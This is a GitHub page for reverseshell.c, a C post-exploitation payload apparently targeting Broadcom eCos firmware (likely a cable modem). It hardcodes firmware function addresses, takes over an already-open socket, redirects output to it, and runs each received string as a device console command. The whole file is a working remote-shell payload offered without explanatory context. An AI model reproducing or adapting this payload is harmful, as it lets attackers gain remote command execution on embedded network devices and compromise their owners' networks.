-
Notifications
You must be signed in to change notification settings - Fork 3
/
reverseshell.c
66 lines (55 loc) · 2.37 KB
/
reverseshell.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#define SAVED_SOCKET_ADDR 0x81385b78
#define RECV_ADDR 0x80f3e084
#define CONSOLE_EXECUTE_ADDR 0x8028bb5c
#define GET_CONSOLE_SINGLETON_ADDR 0x8028bb08
#define MALLOC_ADDR 0x800049b4
#define BZERO_ADDR 0x80ee6f18
#define COMMAND_OFFSET 0x1080
#define SYG_FP_GET 0x80f3b870
#define CYG_FP_FREE 0x80f3b8d8
#define CYG_DF_ASSIGN 0x80f3b798
#define STRLCPY_ADDR 0x808f519c
#define PRINTF_ADDR 0x80ed9bd8
#define DONE_STRING 0x8100b96e
typedef void* strlcpy_t(void* to, void const* from, unsigned int size);
typedef int recv_t(int s, void* buf, unsigned int len, int flags);
typedef void* malloc_t(unsigned int size);
typedef void* bzero_t(void* block, unsigned int size);
typedef void *cyg_fp_get_t(int fd);
typedef void cyg_fp_free_t(void *fp);
typedef int cyg_fd_assign_t(int fd, void *fp);
typedef int printf_t(char *str, ...);
typedef void* BcmConsoleGetSingletonInstance_t(void);
typedef int BcmConsoleExecuteCurrentCommand_t(void* console);
int __start(void) {
recv_t *recv_ptr = (recv_t *) RECV_ADDR;
malloc_t *malloc_ptr = (malloc_t *) MALLOC_ADDR;
bzero_t *bzero_ptr = (bzero_t *) BZERO_ADDR;
strlcpy_t *strlcpy_ptr = (strlcpy_t *) STRLCPY_ADDR;
printf_t *printf_ptr = (printf_t *) PRINTF_ADDR;
cyg_fp_get_t *cyg_fp_get_ptr = (cyg_fp_get_t *) SYG_FP_GET;
cyg_fp_free_t *cyg_fp_free_ptr = (cyg_fp_free_t *) CYG_FP_FREE;
cyg_fd_assign_t *cyg_fd_assign_ptr = (cyg_fd_assign_t *) CYG_DF_ASSIGN;
BcmConsoleExecuteCurrentCommand_t *consoleExecute_ptr = (BcmConsoleExecuteCurrentCommand_t *) CONSOLE_EXECUTE_ADDR;
BcmConsoleGetSingletonInstance_t *consoleGetInstance_ptr = (BcmConsoleGetSingletonInstance_t *) GET_CONSOLE_SINGLETON_ADDR;
int socket = *((int *)SAVED_SOCKET_ADDR);
void *buffer = malloc_ptr(0x100);
void *consoleInstance = consoleGetInstance_ptr();
int receivedBytes = 0x0;
void *fp = cyg_fp_get_ptr(socket);
cyg_fd_assign_ptr(0x1, fp);
cyg_fp_free_ptr(fp);
printf_ptr((char *)DONE_STRING);
for (;;) {
bzero_ptr(buffer, 0x100);
receivedBytes = recv_ptr(socket, buffer, 0x100, 0x0);
if (receivedBytes > 0) {
char *commandBuffer = ((char *)consoleInstance);
commandBuffer += COMMAND_OFFSET;
strlcpy_ptr(commandBuffer, buffer, receivedBytes);
commandBuffer[receivedBytes+1] = 0x0;
consoleExecute_ptr(consoleInstance);
}
}
return 0;
}